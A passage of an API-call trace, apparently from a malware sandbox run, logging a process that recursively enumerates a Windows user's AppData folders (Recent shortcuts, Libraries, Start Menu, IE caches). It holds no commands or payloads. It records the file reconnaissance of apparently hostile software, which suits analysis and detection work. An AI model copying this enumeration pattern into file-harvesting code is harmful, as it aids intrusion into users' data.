returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Windows\\IECompatCache\\Low\\*" [0083.435] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Windows\\IECompatCache\\Low\\*", lpFindFileData=0x18d048 | out: lpFindFileData=0x18d048) returned 0x586c20 [0083.435] FindClose (in: hFindFile=0x586c20 | out: hFindFile=0x586c20) returned 1 [0083.435] FindClose (in: hFindFile=0x586be0 | out: hFindFile=0x586be0) returned 1 [0083.435] PathCombineW (in: pszDest=0x18dba8, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Windows", pszFile="IETldCache" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Windows\\IETldCache") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Windows\\IETldCache" [0083.435] PathCombineW (in: pszDest=0x18d720, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Windows\\IETldCache", pszFile="*" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Windows\\IETldCache\\*") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Windows\\IETldCache\\*" [0083.435] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Windows\\IETldCache\\*", lpFindFileData=0x18d4d0 | out: lpFindFileData=0x18d4d0) returned 0x586be0 [0083.435] PathMatchSpecW (pszFile="index.dat", pszSpec="*") returned 1 [0083.435] PathCombineW (in: pszDest=0x18d720, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Windows\\IETldCache", pszFile="Low" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Windows\\IETldCache\\Low") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Windows\\IETldCache\\Low" [0083.435] PathCombineW (in: pszDest=0x18d298, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Windows\\IETldCache\\Low", pszFile="*" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Windows\\IETldCache\\Low\\*") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Windows\\IETldCache\\Low\\*" [0083.435] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Windows\\IETldCache\\Low\\*", lpFindFileData=0x18d048 | out: lpFindFileData=0x18d048) returned 0x586c20 [0083.435] PathMatchSpecW (pszFile="index.dat", pszSpec="*") returned 1 [0083.435] FindClose (in: hFindFile=0x586c20 | out: hFindFile=0x586c20) returned 1 [0083.435] FindClose (in: hFindFile=0x586be0 | out: hFindFile=0x586be0) returned 1 [0083.435] PathCombineW (in: pszDest=0x18dba8, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Windows", pszFile="Libraries" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Windows\\Libraries") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Windows\\Libraries" [0083.435] PathCombineW (in: pszDest=0x18d720, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Windows\\Libraries", pszFile="*" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Windows\\Libraries\\*") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Windows\\Libraries\\*" [0083.435] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Windows\\Libraries\\*", lpFindFileData=0x18d4d0 | out: lpFindFileData=0x18d4d0) returned 0x586be0 [0083.435] PathMatchSpecW (pszFile="desktop.ini", pszSpec="*") returned 1 [0083.435] PathMatchSpecW (pszFile="Documents.library-ms", pszSpec="*") returned 1 [0083.435] PathMatchSpecW (pszFile="Music.library-ms", pszSpec="*") returned 1 [0083.435] PathMatchSpecW (pszFile="Pictures.library-ms", pszSpec="*") returned 1 [0083.435] PathMatchSpecW (pszFile="Videos.library-ms", pszSpec="*") returned 1 [0083.435] FindClose (in: hFindFile=0x586be0 | out: hFindFile=0x586be0) returned 1 [0083.436] PathCombineW (in: pszDest=0x18dba8, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Windows", pszFile="Network Shortcuts" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Windows\\Network Shortcuts") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Windows\\Network Shortcuts" [0083.436] PathCombineW (in: pszDest=0x18d720, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Windows\\Network Shortcuts", pszFile="*" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Windows\\Network Shortcuts\\*") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Windows\\Network Shortcuts\\*" [0083.436] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Windows\\Network Shortcuts\\*", lpFindFileData=0x18d4d0 | out: lpFindFileData=0x18d4d0) returned 0x586be0 [0083.436] FindClose (in: hFindFile=0x586be0 | out: hFindFile=0x586be0) returned 1 [0083.436] PathCombineW (in: pszDest=0x18dba8, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Windows", pszFile="Printer Shortcuts" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Windows\\Printer Shortcuts") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Windows\\Printer Shortcuts" [0083.436] PathCombineW (in: pszDest=0x18d720, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Windows\\Printer Shortcuts", pszFile="*" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Windows\\Printer Shortcuts\\*") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Windows\\Printer Shortcuts\\*" [0083.437] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Windows\\Printer Shortcuts\\*", lpFindFileData=0x18d4d0 | out: lpFindFileData=0x18d4d0) returned 0x586be0 [0083.437] FindClose (in: hFindFile=0x586be0 | out: hFindFile=0x586be0) returned 1 [0083.437] PathCombineW (in: pszDest=0x18dba8, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Windows", pszFile="PrivacIE" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Windows\\PrivacIE") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Windows\\PrivacIE" [0083.437] PathCombineW (in: pszDest=0x18d720, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Windows\\PrivacIE", pszFile="*" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Windows\\PrivacIE\\*") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Windows\\PrivacIE\\*" [0083.437] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Windows\\PrivacIE\\*", lpFindFileData=0x18d4d0 | out: lpFindFileData=0x18d4d0) returned 0x586be0 [0083.437] PathMatchSpecW (pszFile="index.dat", pszSpec="*") returned 1 [0083.437] PathCombineW (in: pszDest=0x18d720, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Windows\\PrivacIE", pszFile="Low" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Windows\\PrivacIE\\Low") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Windows\\PrivacIE\\Low" [0083.437] PathCombineW (in: pszDest=0x18d298, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Windows\\PrivacIE\\Low", pszFile="*" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Windows\\PrivacIE\\Low\\*") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Windows\\PrivacIE\\Low\\*" [0083.437] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Windows\\PrivacIE\\Low\\*", lpFindFileData=0x18d048 | out: lpFindFileData=0x18d048) returned 0x586c20 [0083.437] PathMatchSpecW (pszFile="index.dat", pszSpec="*") returned 1 [0083.437] FindClose (in: hFindFile=0x586c20 | out: hFindFile=0x586c20) returned 1 [0083.437] FindClose (in: hFindFile=0x586be0 | out: hFindFile=0x586be0) returned 1 [0083.437] PathCombineW (in: pszDest=0x18dba8, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Windows", pszFile="Recent" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Windows\\Recent") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Windows\\Recent" [0083.437] PathCombineW (in: pszDest=0x18d720, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Windows\\Recent", pszFile="*" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\*") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\*" [0083.437] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\*", lpFindFileData=0x18d4d0 | out: lpFindFileData=0x18d4d0) returned 0x586be0 [0083.437] PathMatchSpecW (pszFile="-30A.lnk", pszSpec="*") returned 1 [0083.437] PathMatchSpecW (pszFile="-K1l.lnk", pszSpec="*") returned 1 [0083.437] PathMatchSpecW (pszFile="-m__HyY.flv.lnk", pszSpec="*") returned 1 [0083.437] PathMatchSpecW (pszFile="0bDrkJM8XXXnFRxfDg.lnk", pszSpec="*") returned 1 [0083.437] PathMatchSpecW (pszFile="0DNjPat.lnk", pszSpec="*") returned 1 [0083.437] PathMatchSpecW (pszFile="2Nixhtrz2gmyV.lnk", pszSpec="*") returned 1 [0083.437] PathMatchSpecW (pszFile="2w0hahW-zduMFuM.lnk", pszSpec="*") returned 1 [0083.437] PathMatchSpecW (pszFile="3iTBagJh1TzGAF.lnk", pszSpec="*") returned 1 [0083.438] PathMatchSpecW (pszFile="3why64Tae9g8c4VdM8du.lnk", pszSpec="*") returned 1 [0083.438] PathMatchSpecW (pszFile="4GnnIG6RdLOiij.mkv.lnk", pszSpec="*") returned 1 [0083.438] PathMatchSpecW (pszFile="4K6vEar.lnk", pszSpec="*") returned 1 [0083.438] PathMatchSpecW (pszFile="4QH68b0VZVmVea.lnk", pszSpec="*") returned 1 [0083.438] PathMatchSpecW (pszFile="4zHejp QLa ZE2pa cH.lnk", pszSpec="*") returned 1 [0083.438] PathMatchSpecW (pszFile="5mCV5OJINb0by_M.lnk", pszSpec="*") returned 1 [0083.438] PathMatchSpecW (pszFile="66JSU-GMFXebztL6ygQU.mkv.lnk", pszSpec="*") returned 1 [0083.438] PathMatchSpecW (pszFile="6s KHOwEGy9S7Ui.lnk", pszSpec="*") returned 1 [0083.438] PathMatchSpecW (pszFile="6ZmZ0xKozu28.lnk", pszSpec="*") returned 1 [0083.438] PathMatchSpecW (pszFile="6zu4TtZ9V.lnk", pszSpec="*") returned 1 [0083.438] PathMatchSpecW (pszFile="7BO3.lnk", pszSpec="*") returned 1 [0083.438] PathMatchSpecW (pszFile="7HjWJR_LGMvzxmbh11.lnk", pszSpec="*") returned 1 [0083.438] PathMatchSpecW (pszFile="8bX-DpXHK5F2Jt08OT.lnk", pszSpec="*") returned 1 [0083.438] PathMatchSpecW (pszFile="8DKSg5L.lnk", pszSpec="*") returned 1 [0083.438] PathMatchSpecW (pszFile="8IX078BF_yA.lnk", pszSpec="*") returned 1 [0083.438] PathMatchSpecW (pszFile="8W9SovSulzKgG_lNSllO.lnk", pszSpec="*") returned 1 [0083.438] PathMatchSpecW (pszFile="9rKKEdWHzAr2h.lnk", pszSpec="*") returned 1 [0083.438] PathMatchSpecW (pszFile="9sVjW_9SxQBpOlFRynwd.lnk", pszSpec="*") returned 1 [0083.438] PathMatchSpecW (pszFile="9XjB ynfFlmJrlu8uy.lnk", pszSpec="*") returned 1 [0083.438] PathMatchSpecW (pszFile="A2W4hWIo9JNOPgMLEbON.lnk", pszSpec="*") returned 1 [0083.438] PathMatchSpecW (pszFile="A3eTpG3yiuj.lnk", pszSpec="*") returned 1 [0083.438] PathMatchSpecW (pszFile="Ab9hH.mkv.lnk", pszSpec="*") returned 1 [0083.438] PathMatchSpecW (pszFile="AmGzCyfE3UJ.lnk", pszSpec="*") returned 1 [0083.438] PathMatchSpecW (pszFile="AtpEIf_3ro-.lnk", pszSpec="*") returned 1 [0083.438] PathCombineW (in: pszDest=0x18d720, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Windows\\Recent", pszFile="AutomaticDestinations" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\AutomaticDestinations") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\AutomaticDestinations" [0083.438] PathCombineW (in: pszDest=0x18d298, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\AutomaticDestinations", pszFile="*" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\AutomaticDestinations\\*") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\AutomaticDestinations\\*" [0083.438] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\AutomaticDestinations\\*", lpFindFileData=0x18d048 | out: lpFindFileData=0x18d048) returned 0x586c20 [0083.439] PathMatchSpecW (pszFile="1b4dd67f29cb1962.automaticDestinations-ms", pszSpec="*") returned 1 [0083.439] PathMatchSpecW (pszFile="7e4dca80246863e3.automaticDestinations-ms", pszSpec="*") returned 1 [0083.439] PathMatchSpecW (pszFile="9b9cdc69c1c24e2b.automaticDestinations-ms", pszSpec="*") returned 1 [0083.439] PathMatchSpecW (pszFile="eb282ead62b4db87.automaticDestinations-ms", pszSpec="*") returned 1 [0083.439] PathMatchSpecW (pszFile="fb3b0dbfee58fac8.automaticDestinations-ms", pszSpec="*") returned 1 [0083.439] FindClose (in: hFindFile=0x586c20 | out: hFindFile=0x586c20) returned 1 [0083.439] PathMatchSpecW (pszFile="B4honwPP90ft9NBJsJ.flv.lnk", pszSpec="*") returned 1 [0083.439] PathMatchSpecW (pszFile="BDa5B4GVrREPMxye24.lnk", pszSpec="*") returned 1 [0083.439] PathMatchSpecW (pszFile="BQbMQWsA.lnk", pszSpec="*") returned 1 [0083.439] PathMatchSpecW (pszFile="bwFwGum5_tu.lnk", pszSpec="*") returned 1 [0083.439] PathMatchSpecW (pszFile="cDuwllOG1a13fdUSRtyT.lnk", pszSpec="*") returned 1 [0083.439] PathMatchSpecW (pszFile="CJ3VRj.lnk", pszSpec="*") returned 1 [0083.439] PathMatchSpecW (pszFile="CNyryAkAB.lnk", pszSpec="*") returned 1 [0083.439] PathCombineW (in: pszDest=0x18d720, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Windows\\Recent", pszFile="CustomDestinations" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\CustomDestinations") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\CustomDestinations" [0083.439] PathCombineW (in: pszDest=0x18d298, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\CustomDestinations", pszFile="*" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\CustomDestinations\\*") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\CustomDestinations\\*" [0083.439] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\CustomDestinations\\*", lpFindFileData=0x18d048 | out: lpFindFileData=0x18d048) returned 0x586c20 [0083.440] PathMatchSpecW (pszFile="1b4dd67f29cb1962.customDestinations-ms", pszSpec="*") returned 1 [0083.440] PathMatchSpecW (pszFile="590aee7bdd69b59b.customDestinations-ms", pszSpec="*") returned 1 [0083.440] PathMatchSpecW (pszFile="5afe4de1b92fc382.customDestinations-ms", pszSpec="*") returned 1 [0083.440] PathMatchSpecW (pszFile="7e4dca80246863e3.customDestinations-ms", pszSpec="*") returned 1 [0083.440] PathMatchSpecW (pszFile="969252ce11249fdd.customDestinations-ms", pszSpec="*") returned 1 [0083.440] FindClose (in: hFindFile=0x586c20 | out: hFindFile=0x586c20) returned 1 [0083.440] PathMatchSpecW (pszFile="Cwm2k.lnk", pszSpec="*") returned 1 [0083.440] PathMatchSpecW (pszFile="desktop.ini", pszSpec="*") returned 1 [0083.441] PathMatchSpecW (pszFile="Ea27DuZ.lnk", pszSpec="*") returned 1 [0083.441] PathMatchSpecW (pszFile="eo9uwSYwbQ8w-H9nZNH.lnk", pszSpec="*") returned 1 [0083.441] PathMatchSpecW (pszFile="f9Kz7FajrZe1D3cJu.lnk", pszSpec="*") returned 1 [0083.441] PathMatchSpecW (pszFile="f9qMY.lnk", pszSpec="*") returned 1 [0083.441] PathMatchSpecW (pszFile="fekn9-cYjXE.lnk", pszSpec="*") returned 1 [0083.441] PathMatchSpecW (pszFile="fI8HtTYnLk.lnk", pszSpec="*") returned 1 [0083.441] PathMatchSpecW (pszFile="fvW2_oNzD WbqiCr-MPh.lnk", pszSpec="*") returned 1 [0083.441] PathMatchSpecW (pszFile="fWYvTfhZ8pDF fugPxx.lnk", pszSpec="*") returned 1 [0083.441] PathMatchSpecW (pszFile="fyH-uEyk.lnk", pszSpec="*") returned 1 [0083.441] PathMatchSpecW (pszFile="GerI56Fqfwp_.mkv.lnk", pszSpec="*") returned 1 [0083.441] PathMatchSpecW (pszFile="GfolyaPf5e_.lnk", pszSpec="*") returned 1 [0083.441] PathMatchSpecW (pszFile="GniRADlcdXM4e2NV8Q9.lnk", pszSpec="*") returned 1 [0083.441] PathMatchSpecW (pszFile="gSeMslrV-UMnw.lnk", pszSpec="*") returned 1 [0083.441] PathMatchSpecW (pszFile="GWgVhSNyFu dKu.lnk", pszSpec="*") returned 1 [0083.441] PathMatchSpecW (pszFile="gXiF8Ie492m0IXBb.lnk", pszSpec="*") returned 1 [0083.441] PathMatchSpecW (pszFile="hW8kL.lnk", pszSpec="*") returned 1 [0083.441] PathMatchSpecW (pszFile="HxDmDA2.lnk", pszSpec="*") returned 1 [0083.441] PathMatchSpecW (pszFile="i5O0_LIU2IZEasfZ7kGw.ots.lnk", pszSpec="*") returned 1 [0083.441] PathMatchSpecW (pszFile="IjwM7q33.lnk", pszSpec="*") returned 1 [0083.441] PathMatchSpecW (pszFile="iOIPdOtfzh B E9C.mkv.lnk", pszSpec="*") returned 1 [0083.441] PathMatchSpecW (pszFile="ItqxY4z Y 4rVAHIrmZY.lnk", pszSpec="*") returned 1 [0083.441] PathMatchSpecW (pszFile="jzyu_DZ Ndc.lnk", pszSpec="*") returned 1 [0083.441] PathMatchSpecW (pszFile="k-_w4gLllVwoL83pf.lnk", pszSpec="*") returned 1 [0083.441] PathMatchSpecW (pszFile="k9t4FeIHN.lnk", pszSpec="*") returned 1 [0083.441] PathMatchSpecW (pszFile="kAq1- 39jYRD61eR-q W.lnk", pszSpec="*") returned 1 [0083.441] PathMatchSpecW (pszFile="kBFP3Db2Q.lnk", pszSpec="*") returned 1 [0083.441] PathMatchSpecW (pszFile="L s6Njtmvi.lnk", pszSpec="*") returned 1 [0083.441] PathMatchSpecW (pszFile="LmPLyJ2Ow.lnk", pszSpec="*") returned 1 [0083.441] PathMatchSpecW (pszFile="m3h5tfwIa0qf.lnk", pszSpec="*") returned 1 [0083.441] PathMatchSpecW (pszFile="mctbo0q.flv.lnk", pszSpec="*") returned 1 [0083.441] PathMatchSpecW (pszFile="Me7y1usyGmJu.flv.lnk", pszSpec="*") returned 1 [0083.441] PathMatchSpecW (pszFile="MexIfyKM-sbW8O.lnk", pszSpec="*") returned 1 [0083.441] PathMatchSpecW (pszFile="mtkGNF4Nxp1Jq.lnk", pszSpec="*") returned 1 [0083.442] PathMatchSpecW (pszFile="My Music.lnk", pszSpec="*") returned 1 [0083.442] PathMatchSpecW (pszFile="My Pictures.lnk", pszSpec="*") returned 1 [0083.442] PathMatchSpecW (pszFile="My Videos.lnk", pszSpec="*") returned 1 [0083.442] PathMatchSpecW (pszFile="NDKwV1zojdnIvD.lnk", pszSpec="*") returned 1 [0083.442] PathMatchSpecW (pszFile="OxDXUrN_NRgHCzwB.lnk", pszSpec="*") returned 1 [0083.442] PathMatchSpecW (pszFile="p7a41UXJZx6F.lnk", pszSpec="*") returned 1 [0083.442] FindClose (in: hFindFile=0x586be0 | out: hFindFile=0x586be0) returned 1 [0083.442] PathCombineW (in: pszDest=0x18dba8, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Windows", pszFile="SendTo" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Windows\\SendTo") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Windows\\SendTo" [0083.442] PathCombineW (in: pszDest=0x18d720, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Windows\\SendTo", pszFile="*" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Windows\\SendTo\\*") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Windows\\SendTo\\*" [0083.442] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Windows\\SendTo\\*", lpFindFileData=0x18d4d0 | out: lpFindFileData=0x18d4d0) returned 0x586be0 [0083.442] FindClose (in: hFindFile=0x586be0 | out: hFindFile=0x586be0) returned 1 [0083.443] PathCombineW (in: pszDest=0x18dba8, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Windows", pszFile="Start Menu" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu" [0083.443] PathCombineW (in: pszDest=0x18d720, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu", pszFile="*" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\*") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\*" [0083.443] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\*", lpFindFileData=0x18d4d0 | out: lpFindFileData=0x18d4d0) returned 0x586be0 [0083.443] PathCombineW (in: pszDest=0x18d720, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu", pszFile="Programs" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs" [0083.443] PathCombineW (in: pszDest=0x18d298, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs", pszFile="*" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\*") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\*" [0083.443] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\*", lpFindFileData=0x18d048 | out: lpFindFileData=0x18d048) returned 0x586c20 [0083.443] PathCombineW (in: pszDest=0x18d298, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs", pszFile="Accessories" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories" [0083.443] PathCombineW (in: pszDest=0x18ce10, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories", pszFile="*" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\*") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\*" [0083.443] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\*", lpFindFileData=0x18cbc0 | out: lpFindFileData=0x18cbc0) returned 0x586c60 [0083.443] PathCombineW (in: pszDest=0x18ce10, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories", pszFile="Accessibility" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\Accessibility") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\Accessibility" [0083.443] PathCombineW (in: pszDest=0x18c988, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\Accessibility", pszFile="*" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\Accessibility\\*") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\Accessibility\\*" [0083.443] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\Accessibility\\*", lpFindFileData=0x18c738 | out: lpFindFileData=0x18c738) returned 0x586ca0 [0083.444] FindClose (in: hFindFile=0x586ca0 | out: hFindFile=0x586ca0) returned 1 [0083.444] PathCombineW (in: pszDest=0x18ce10, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories", pszFile="System Tools" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\System Tools") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\System Tools" [0083.444] PathCombineW (in: pszDest=0x18c988, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\System Tools", pszFile="*" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\System Tools\\*") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\System Tools\\*" [0083.444] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\System Tools\\*", lpFindFileData=0x18c738 | out: lpFindFileData=0x18c738) returned 0x586ca0 [0083.444] FindClose (in: hFindFile=0x586ca0 | out: hFindFile=0x586ca0) returned 1 [0083.445] FindClose (in: hFindFile=0x586c60 | out: hFindFile=0x586c60) returned 1 [0083.445] PathCombineW (in: pszDest=0x18d298, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs", pszFile="Administrative Tools" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Administrative Tools") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Administrative Tools" [0083.445] PathCombineW (in: pszDest=0x18ce10, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Administrative Tools", pszFile="*" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Administrative Tools\\*") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Administrative Tools\\*" [0083.445] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Administrative Tools\\*", lpFindFileData=0x18cbc0 | out: lpFindFileData=0x18cbc0) returned 0x586c60 [0083.445] FindClose (in: hFindFile=0x586c60 | out: hFindFile=0x586c60) returned 1 [0083.445] 